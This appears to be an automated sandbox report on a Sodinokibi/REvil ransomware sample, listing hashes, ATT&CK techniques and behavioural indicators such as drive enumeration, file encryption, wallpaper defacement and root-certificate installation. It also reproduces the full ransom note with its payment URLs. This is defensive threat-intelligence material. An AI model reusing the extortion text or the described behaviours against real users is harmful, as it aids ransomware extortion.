sodinokibi | d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c

General

Target

d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
Size

164KB
MD5

6b391f91c63765876e2571e87fe46575
SHA1

d508632ca452af6325c06434b29883cfa55d7948
SHA256

d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c
SHA512

2e1c522393b137d7847c405cdaa735a4255fde534c8006460ef1a984eacc135fd8668fbd756d06b9011299911c2fd57c1a9112d01c046ebe8c98058b1abfae34
SSDEEP

3072:pEa2d8CfSXceqmPDu7lvspW0kAo0BQhyI0hQMnnsJ:5CqlPDuBkJpoQQgdnns

Score

10^/10

sodinokibi ransomware

Malware Config

Extracted

Path

C:\Users\z935364-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension z935364. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/8E01FCBDFB269F17 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/8E01FCBDFB269F17 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: VPg4aYXMEsun4TUJVDCjA2HS9Rm/cMGNkXt+JD2bkfx6mi4TDKjARxRq4QCJtxbM vrm1rrBpXtRwgU439A/2tB0rwhzG7EyMI4MN3cs/DT3qqDpQ9xN+rpkcS96xMy5k S2fXuZ1ZN1lZNmLsk4MqXYrHNnntRfRC52RpakBikaFsP8+RMKTj98NQbV9Jg/xk p/scaef1G/Ic50t3/uIpT3HbjUYtS2jOlVCZA0P7MQaaI61nXME9t1oDyM8zLqHO 4bQxzOvfeqDrGtlzOWrx14JibqMVB+07+AGIUANzwjNQ4pkQSWlzsA1N3yQ/d1rM ehx1MNxuhiqrGrV5U0KvrbAQugyOBLoSFHn18ej1kJEZESG16YSqJi1Snc3AlHq4 4FBS1yawIrcDFNlq8396OAgTAUHDc7lVIEg+GrdZGA6RdW9EdyVaW9hnzaO2wq8y YKC5eZ9UvzlsqOKCVFWwYoE2QtBkbp2unJUKvxaOlZNO0kfJsC9O2bk/6yvzlLKe 0DT/w5IVESkn2MtZMpikHK4iXq8+3iSKp8JF+ZZx82zOXcvFbEukDPqTxd8GFyJw Z2U4HxIS9143m9uYVSyiSqY+VBsIW6yCdxhpmI2MJ+Skdw/eWvKl5OVUBCUUixOX Jttmhf6+SVP1FK3X32x3xtjiyVIj96/GEmfGlpJ3lisSJttBziOUoGVlKuNOtse2 J7CgKKcPQxdwBL4Hnv2W44VIy4/ZMDooo9xsCG+AvkP3MAL1N6gtTT5g9LPXWwxP hi0pqnywCMhPhhh6hHugat2sZSl2L149/MVkEV6nVyAI1VB2FBS1hGxicrKaVcXI 4XVEKdA8n/hbf90D/lY+aEaanriSkl1Fg8ZNPuAEyNNCuGDRiWyZL3XRCxPz9CfA pYnYTAih7wNtoOodLQvuh8XDUoDXSWG69U6KYkZDBTIotKiMTGZJfIv5YdFzz1db 05vvRmimNwm2bfw6eaWOIl+PsyQ7tM8I7bT5dq26JpRn4UDkVNPK2FfzBrw5fc8k 2xiPp06AiHl11rvXLbAM5v5nzBvLPCCrmlxFZYorFD9u42PiNShTIRPNAhSqi8E2 DychC8T0dF61pH3i4GZdHoIAgcVHb58F378CHedpMn6z60lRSjlysLdVVTWOk4xy rJP5gXUmrQNkpezhs1uO+LRebQzARWnVeX8ZmGv3RSpEkNCERkZiyOc3pfn9OMCS lFNyXg/v4BsIn8qHo6E= Extension name: z935364 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/8E01FCBDFB269F17

http://decryptor.top/8E01FCBDFB269F17

Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi

Enumerates connected drives 3 TTPs 25 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe

description	ioc	process
File opened (read-only)	\??\L:	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened (read-only)	\??\O:	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened (read-only)	\??\R:	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened (read-only)	\??\U:	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened (read-only)	\??\V:	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened (read-only)	\??\D:	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened (read-only)	\??\G:	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened (read-only)	\??\H:	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened (read-only)	\??\F:	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened (read-only)	\??\I:	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened (read-only)	\??\P:	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened (read-only)	\??\M:	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened (read-only)	\??\N:	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened (read-only)	\??\T:	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened (read-only)	\??\Y:	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened (read-only)	\??\A:	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened (read-only)	\??\E:	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened (read-only)	\??\K:	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened (read-only)	\??\Q:	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened (read-only)	\??\S:	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened (read-only)	\??\W:	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened (read-only)	\??\X:	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened (read-only)	\??\Z:	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened (read-only)	\??\B:	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened (read-only)	\??\J:	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe

Drops file in System32 directory 1 IoCs

Processes:

d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe

description	ioc	process
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4159544280-4273523227-683900707-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\p9f6p960a1.bmp"	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe

Drops file in Program Files directory 30 IoCs

Processes:

d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe

description	ioc	process
File created	\??\c:\program files (x86)\z935364-readme.txt	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened for modification	\??\c:\program files\ConnectResolve.ADT	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened for modification	\??\c:\program files\EnterInstall.ex_	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened for modification	\??\c:\program files\RestoreInvoke.xltm	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened for modification	\??\c:\program files\WritePublish.clr	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File created	\??\c:\program files (x86)\microsoft sql server compact edition\z935364-readme.txt	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File created	\??\c:\program files (x86)\microsoft sql server compact edition\v3.5\desktop\z935364-readme.txt	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened for modification	\??\c:\program files\EnableJoin.vssm	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened for modification	\??\c:\program files\ProtectInitialize.rar	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened for modification	\??\c:\program files\ReceiveRestore.xml	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened for modification	\??\c:\program files\TestAssert.ini	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened for modification	\??\c:\program files\DisableComplete.DVR-MS	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened for modification	\??\c:\program files\EditPop.emz	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened for modification	\??\c:\program files\LockSearch.midi	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened for modification	\??\c:\program files\RedoPing.vb	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened for modification	\??\c:\program files\WatchRedo.7z	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened for modification	\??\c:\program files\BackupLock.mp4v	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened for modification	\??\c:\program files\CompleteRevoke.aiff	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened for modification	\??\c:\program files\StartApprove.zip	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened for modification	\??\c:\program files\WaitAssert.html	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened for modification	\??\c:\program files\RenameBackup.mpg	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened for modification	\??\c:\program files\UpdateUnblock.mp2	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened for modification	\??\c:\program files\GroupRepair.mp4	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened for modification	\??\c:\program files\JoinUndo.tmp	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened for modification	\??\c:\program files\LimitEnable.mp4	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened for modification	\??\c:\program files\RestoreResume.contact	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened for modification	\??\c:\program files\SearchUpdate.mov	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File created	\??\c:\program files\z935364-readme.txt	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File opened for modification	\??\c:\program files\UpdateCheckpoint.jfif	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
File created	\??\c:\program files (x86)\microsoft sql server compact edition\v3.5\z935364-readme.txt	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe

Modifies system certificate store 2 TTPs 8 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 430000000100000000000000040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f007400200043004100200058003300000020000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\C1C118268BE0F3EE1307A4EE9A2E86F1914C7C4C	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\C1C118268BE0F3EE1307A4EE9A2E86F1914C7C4C\Blob = 0f000000010000002000000052bf5ba22178c81aac07cb682b596b4848e84e3547eccf9b23f50a913fc01707030000000100000014000000c1c118268be0f3ee1307a4ee9a2e86f1914c7c4c2000000001000000f9020000308202f5308201dda00302010202103187a53a25257e7f5c01dfa1fbefb182300d06092a864886f70d01010b050030133111300f06035504031308436c6f75644e6574301e170d3233303630323232303030305a170d3238303533313232303030305a30133111300f06035504031308436c6f75644e657430820122300d06092a864886f70d01010105000382010f003082010a0282010100ce623419feaae61559f84c1fd2ccc687134dcda05f36be14f057efdcc3eb92b48470d8b6c059887f0ab52a29d3892f1d386506e9aaf460ea9153fc76870834a89106ecc21c997c33b50ec3bbf194cafea3513ab53ec6c977796748f22796f04d52b22535551cd56e875783214c00f305805edebb53e5fa1aa2b63f4c2135530ba8f8e6f03fe46a466919332abfbd2ad3f1b6cfc676305a09facc27a1ba2439fa4b422795bf9a1802a4f09ad40f8d2d19cbbdb037df5be346164764ace8a696d74b8a95d7a866da8533fdd952b683e6622883e2fa180a4cd11c89cc0fc4feb8d964b5facd07882d1645f107f36892e40ae2e07ef14019f48ef380ecedcb984d0d0203010001a3453043300e0603551d0f0101ff04040302010630120603551d130101ff040830060101ff020101301d0603551d0e04160414ab1e885f0f5d5f2cb3d9a04ac5dd982db4f50c8f300d06092a864886f70d01010b05000382010100bd6d7fc3191b47829060c729974cfd60e35ae605238f01b0d343a3cbe01fbc86f57e4ff84bebd06b5125c822a7f71876690a23bcf2272c4ea2b169fe36bf96e4a79204a3accdd53c3abbf3013fbeb75e849c9dd9a47b7175d5fae8eac4531cdab6d33360fe3b3dbf81ea21e712be3fca25511c3d1d0cf6c165db5e1ad5b873425900c9e10508e41434f4f568df77d3eb04d0071f4fe937c6e15f99d2e9862e5cb9df970bbd4d7c00f0d3702a8490e017757021e8a16cf8194e2adde25a4435a48e3b9808a289efe87fd3575637d3f9ffa1e6fb7b947a7c5243f1d0e3c817302529e9b064b11c9c4b9e7744ec7c703da48c223f33b089107292b32b8879febce7	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\C1C118268BE0F3EE1307A4EE9A2E86F1914C7C4C\Blob = 140000000100000014000000ab1e885f0f5d5f2cb3d9a04ac5dd982db4f50c8f030000000100000014000000c1c118268be0f3ee1307a4ee9a2e86f1914c7c4c0f000000010000002000000052bf5ba22178c81aac07cb682b596b4848e84e3547eccf9b23f50a913fc017072000000001000000f9020000308202f5308201dda00302010202103187a53a25257e7f5c01dfa1fbefb182300d06092a864886f70d01010b050030133111300f06035504031308436c6f75644e6574301e170d3233303630323232303030305a170d3238303533313232303030305a30133111300f06035504031308436c6f75644e657430820122300d06092a864886f70d01010105000382010f003082010a0282010100ce623419feaae61559f84c1fd2ccc687134dcda05f36be14f057efdcc3eb92b48470d8b6c059887f0ab52a29d3892f1d386506e9aaf460ea9153fc76870834a89106ecc21c997c33b50ec3bbf194cafea3513ab53ec6c977796748f22796f04d52b22535551cd56e875783214c00f305805edebb53e5fa1aa2b63f4c2135530ba8f8e6f03fe46a466919332abfbd2ad3f1b6cfc676305a09facc27a1ba2439fa4b422795bf9a1802a4f09ad40f8d2d19cbbdb037df5be346164764ace8a696d74b8a95d7a866da8533fdd952b683e6622883e2fa180a4cd11c89cc0fc4feb8d964b5facd07882d1645f107f36892e40ae2e07ef14019f48ef380ecedcb984d0d0203010001a3453043300e0603551d0f0101ff04040302010630120603551d130101ff040830060101ff020101301d0603551d0e04160414ab1e885f0f5d5f2cb3d9a04ac5dd982db4f50c8f300d06092a864886f70d01010b05000382010100bd6d7fc3191b47829060c729974cfd60e35ae605238f01b0d343a3cbe01fbc86f57e4ff84bebd06b5125c822a7f71876690a23bcf2272c4ea2b169fe36bf96e4a79204a3accdd53c3abbf3013fbeb75e849c9dd9a47b7175d5fae8eac4531cdab6d33360fe3b3dbf81ea21e712be3fca25511c3d1d0cf6c165db5e1ad5b873425900c9e10508e41434f4f568df77d3eb04d0071f4fe937c6e15f99d2e9862e5cb9df970bbd4d7c00f0d3702a8490e017757021e8a16cf8194e2adde25a4435a48e3b9808a289efe87fd3575637d3f9ffa1e6fb7b947a7c5243f1d0e3c817302529e9b064b11c9c4b9e7744ec7c703da48c223f33b089107292b32b8879febce7	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\C1C118268BE0F3EE1307A4EE9A2E86F1914C7C4C\Blob = 1900000001000000100000000778d3e10289ad7e2403124bffa8996f0f000000010000002000000052bf5ba22178c81aac07cb682b596b4848e84e3547eccf9b23f50a913fc01707030000000100000014000000c1c118268be0f3ee1307a4ee9a2e86f1914c7c4c140000000100000014000000ab1e885f0f5d5f2cb3d9a04ac5dd982db4f50c8f2000000001000000f9020000308202f5308201dda00302010202103187a53a25257e7f5c01dfa1fbefb182300d06092a864886f70d01010b050030133111300f06035504031308436c6f75644e6574301e170d3233303630323232303030305a170d3238303533313232303030305a30133111300f06035504031308436c6f75644e657430820122300d06092a864886f70d01010105000382010f003082010a0282010100ce623419feaae61559f84c1fd2ccc687134dcda05f36be14f057efdcc3eb92b48470d8b6c059887f0ab52a29d3892f1d386506e9aaf460ea9153fc76870834a89106ecc21c997c33b50ec3bbf194cafea3513ab53ec6c977796748f22796f04d52b22535551cd56e875783214c00f305805edebb53e5fa1aa2b63f4c2135530ba8f8e6f03fe46a466919332abfbd2ad3f1b6cfc676305a09facc27a1ba2439fa4b422795bf9a1802a4f09ad40f8d2d19cbbdb037df5be346164764ace8a696d74b8a95d7a866da8533fdd952b683e6622883e2fa180a4cd11c89cc0fc4feb8d964b5facd07882d1645f107f36892e40ae2e07ef14019f48ef380ecedcb984d0d0203010001a3453043300e0603551d0f0101ff04040302010630120603551d130101ff040830060101ff020101301d0603551d0e04160414ab1e885f0f5d5f2cb3d9a04ac5dd982db4f50c8f300d06092a864886f70d01010b05000382010100bd6d7fc3191b47829060c729974cfd60e35ae605238f01b0d343a3cbe01fbc86f57e4ff84bebd06b5125c822a7f71876690a23bcf2272c4ea2b169fe36bf96e4a79204a3accdd53c3abbf3013fbeb75e849c9dd9a47b7175d5fae8eac4531cdab6d33360fe3b3dbf81ea21e712be3fca25511c3d1d0cf6c165db5e1ad5b873425900c9e10508e41434f4f568df77d3eb04d0071f4fe937c6e15f99d2e9862e5cb9df970bbd4d7c00f0d3702a8490e017757021e8a16cf8194e2adde25a4435a48e3b9808a289efe87fd3575637d3f9ffa1e6fb7b947a7c5243f1d0e3c817302529e9b064b11c9c4b9e7744ec7c703da48c223f33b089107292b32b8879febce7	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe

Suspicious behavior: EnumeratesProcesses 21 IoCs

Processes:

d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exepowershell.exetaskmgr.exe

pid	process
2624	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
2176	powershell.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

taskmgr.exe

pid process

2000 taskmgr.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exevssvc.exetaskmgr.exe

description	pid	process
Token: SeDebugPrivilege	2176	powershell.exe
Token: SeBackupPrivilege	2920	vssvc.exe
Token: SeRestorePrivilege	2920	vssvc.exe
Token: SeAuditPrivilege	2920	vssvc.exe
Token: SeDebugPrivilege	2000	taskmgr.exe

Suspicious use of FindShellTrayWindow 42 IoCs

Processes:

taskmgr.exe

pid	process
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
